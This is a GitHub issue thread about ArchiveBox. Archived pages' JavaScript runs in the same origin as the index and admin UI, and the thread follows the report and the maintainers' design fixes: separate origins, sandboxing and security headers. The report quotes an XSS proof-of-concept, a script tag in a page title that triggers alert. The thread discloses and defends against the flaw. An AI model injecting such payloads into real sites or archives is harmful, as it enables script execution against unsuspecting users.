Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239

s7x · 2019-05-14T09:48:52Z

Describe the bug

Hi there!
There's an XSS vulnerability when you open your index.html if you saved a page with a title containing an XSS vector.

Steps to reproduce

Save this page for example: [Twitter of @garethheyes] ](https://twitter.com/garethheyes/status/1126526480614416395)
Open your index.html
Get XSS'd by sir @garethheyes

Source code:

<a href="archive/1557816881/twitter.com/garethheyes/status/1126526480614416395.html" title="\u2028\u2029 op Twitter: "Another way to use throw without a semi-colon:
<script>{onerror=alert}throw 1</script>"">

Software versions

OS: ArchLinux
ArchiveBox version: 903.59da482-1
Python version: python3.7
Chrome version: Chromium 74.0.3729.131 Arch Linux

The text was updated successfully, but these errors were encountered:

pirate · 2019-05-18T00:24:16Z

I'm aware of this already, the reason I haven't immediately locked it down is because archived pages can already run arbitrary Javascript in the context of your archive domain, so there's not much we can do to protect against that attack vector without breaking interactivity across all archived pages. If I add bleach-style XSS stripping to titles it'll make the title page less likely to break from a UX perspective, but it doesn't make it any more secure because archived pages can just request the index page at any time directly using JavaScript.

v0.4 is going to add some security headers that will make it more difficult for pages to use JS to access other archived pages, but it's never going to be perfect unless we have each archived page stored on its own domain.

I'm having long conversations with several people this week about the security model of archivebox, it's a difficult problem but I think we'll have to end up disabling all Javascript in the static HTML archives and only allowing proxy replaying of WARCs if people want interactivity preserved. I'm going to move all the filesystem stuff in to hash-bucketed folders to discourage people from opening the saved html files directly and only accessing them via nginx or the django webserver, as allowing archived JS to have filesystem access is disastrously bad security.

pirate · 2019-05-20T18:45:11Z

Because this is fairly serious I've temporarily striked-out the instructions for running archivebox with private data: https://github.com/pirate/ArchiveBox/wiki/Security-Overview#important-dont-use-archivebox-for-private-archived-content-right-now-as-were-in-the-middle-of-resolving-some-security-issues-with-how-js-is-executed-in-archived-content

Unfortunately my day job is getting super busy right now so I don't know how soon I can change the design (fixing this is a big architectural change), but I think I might add a notice to the README as well to warn people that running archived pages can leak the index and content in the current state. The primary use case is archiving public pages and feeds so it's not as bad as if it were doing private session archiving by default, but I don't want to give users a false sense of security so we should definitely be transparent about the risks.

s7x · 2019-05-24T13:08:07Z

Hi @pirate! I know the issue is not that critical when you're using archivebox only locally (like I do) cause you're aware of what you are doing (supposed at least) when you save pages and stuff like this but still I think that some people would be happy to know there's no random JS popping up in their hoarding box :)

Thanks for your time & consideration. And for sure, thanks for this awesome tool.

Cheers!

andrewzigerelli · 2019-07-17T20:15:42Z

Why does this only affect title? Is it possible that this XSS opportunity exists elsewhere?

pirate · 2019-09-25T06:29:37Z

@andrewzigerelli see my comment above. A primary goal of ArchiveBox is to preserve JS and interactivity in archived pages, but that means pages necessarily have to be able to execute their own arbitrary JS.

XSS-stripping titles or any of the other little metadata fields is like putting up a small picket fence to try and stop a tsunami. Why would an attacker bother going to the trouble to stuff some XSS payload in page titles when they can just put JS on the page directly knowing it will be executed by ArchiveBox users on a domain shared with the index and all the other pages? (the whole traditional browser security model breaks without CORS protections. the invisible wall that stops xxxhacker.com from accessing your data on facebook.com is the fact that it's on a different domain, but all archived pages are served from the same domain)

archived pages can already run arbitrary Javascript in the context of your archive domain, so there's not much we can do to protect against that attack vector without breaking interactivity across all archived pages

archived pages can just request the index page at any time directly using JavaScript

pirate · 2021-05-12T22:26:40Z

Idea h/t for encouragement from @FiloSottile, and similar to how Wikimedia and many other services do it:

serve all "dirty" archived content from one port, e.g. 9595. including static archive/<timestamp>/index.html indexes, archived content with live JS, etc. that could be dangerous
serve the django admin interface from 9594, with the login screen, ability to add new snapshots, remove URLs, etc. shoudl not be on the same origin as the risky archived content

These can be mapped to separate domains/ports (subdomains are dangerous?maybe, full domains likely required) by the user, but will require adding some new config options to tune what port/domain the admin and dirty content are listening on: e.g.
HTTP_DIRTY_LISTEN=https://demousercontent.archivebox.io
HTTP_ADMIN_LISTEN=https://demo.archivebox.io

This would close a pretty crucial security hole where archived content can mess with the execution of extractors (and potentially run abitrary shell scripts if they chain together a series of injection attacks).

Semi-Related, using sandbox iframes for replay: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Mode

Extractor methods that replay JS:

wget
dom

Proposed behavior:

if dirty content is loaded fromw within iframe (with sandbox protections): allow JS, because iframe sandboxes protect us (verify this first)
if dirty content is loaded outside an iframe (e.g. if someone visits the URL directly): serve strict CSP/CORS headers to prevent JS execution entirely
prevent right clicking the iframe to get the unsafe url and open it in a new tab directly ? or detect server side if dirty url is visited outside an iframe and prevent it?

config option to enable bypassing sandboxing:

DANGER_ALLOW_BYPASSING_SANDOX=True/False
once enabled ^ checkbox appears on a per-snapshot basis that allows disabling iframe/csp sandbox protections when replaying that snapshot

FiloSottile · 2021-06-21T04:06:42Z

I talked about the ArchiveBox scenario with a couple experts, and we came up with a better option than <iframe sandbox>: Content-Security-Policy: sandbox, which instructs the browser to treat the load as its own unique origin.

This is much more robust and convenient than detecting iframe loads.

We also went through the list of security headers to pick the ones that would protect ArchiveBox pages from Spectre, too. They should involve no maintenance.

Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-origin [FOR HTML] / cross-origin [FOR NOT HTML]
Vary: Sec-Fetch-Site
X-Content-Type-Options: nosniff

On top of that, it would still be a good idea to have the admin API on a different origin (a different subdomain is enough), and make its cookie SameSite=Strict.

This should stop any cross-contamination between archived pages, but it won't stop them from detecting other archived pages. That might be possible, but it will require more complex server logic.

agnosticlines · 2022-07-24T10:27:19Z

Hi! Sorry to post on such an old issue, just wondering if this is going to be implemented? Would love to be able to use WARC instead of SingleFile

pirate changed the title ~~[Vulnerability] XSS in saved page title~~ ArchiveBox security model allows archived content to execute JS in a filesystem context May 18, 2019

pirate changed the title ~~ArchiveBox security model allows archived content to execute JS in a filesystem context~~ Archived JS executes in a context shared with all other archived content May 18, 2019

pirate added touches: data/schema/architecture size: hard why: security Intended to improve ArchiveBox security or data integrity status: wip Work is in-progress / has already been partially completed labels May 18, 2019

pirate changed the title ~~Archived JS executes in a context shared with all other archived content~~ Architecture: Archived JS executes in a context shared with all other archived content May 20, 2019

pirate pinned this issue May 20, 2019

pirate mentioned this issue May 20, 2019

v0.4 (first Django release) #207

Merged

pirate mentioned this issue Mar 18, 2020

Bugfix: Title with an HTML tags breaks the UI and archive process #330

Closed

pirate unpinned this issue Apr 6, 2021

pirate changed the title ~~Architecture: Archived JS executes in a context shared with all other archived content~~ Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) May 12, 2021

pirate pinned this issue May 13, 2021

pirate modified the milestones: v0.8, v0.7.0 Jun 1, 2021

pirate mentioned this issue Jun 24, 2021

Private Disclosure #772

Closed

kotovalexarian mentioned this issue Aug 9, 2022

Question: Can I disable all JS without breaking the UI? #1011

Closed

pirate mentioned this issue Feb 28, 2023

Discussion: Serve in a subfolder #724

Closed

p0n1 mentioned this issue Nov 3, 2023

DOM extractor output contains JS that can be executed upon viewing, and is subject to same security risks as viewing WGET output #1261

Closed

pirate mentioned this issue Jan 20, 2024

Architecture: Strip all Javascript from static html archives by default #237

Closed

8 tasks

pirate unpinned this issue Sep 26, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239

Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239

s7x commented May 14, 2019

pirate commented May 18, 2019 •

edited

Loading

pirate commented May 20, 2019 •

edited

Loading

s7x commented May 24, 2019

andrewzigerelli commented Jul 17, 2019 •

edited

Loading

pirate commented Sep 25, 2019 •

edited

Loading

pirate commented May 12, 2021 •

edited

Loading

FiloSottile commented Jun 21, 2021

agnosticlines commented Jul 24, 2022

Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239

Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239

Comments

s7x commented May 14, 2019

Describe the bug

Steps to reproduce

Software versions

pirate commented May 18, 2019 • edited Loading

pirate commented May 20, 2019 • edited Loading

s7x commented May 24, 2019

andrewzigerelli commented Jul 17, 2019 • edited Loading

pirate commented Sep 25, 2019 • edited Loading

pirate commented May 12, 2021 • edited Loading

FiloSottile commented Jun 21, 2021

agnosticlines commented Jul 24, 2022

pirate commented May 18, 2019 •

edited

Loading

pirate commented May 20, 2019 •

edited

Loading

andrewzigerelli commented Jul 17, 2019 •

edited

Loading

pirate commented Sep 25, 2019 •

edited

Loading

pirate commented May 12, 2021 •

edited

Loading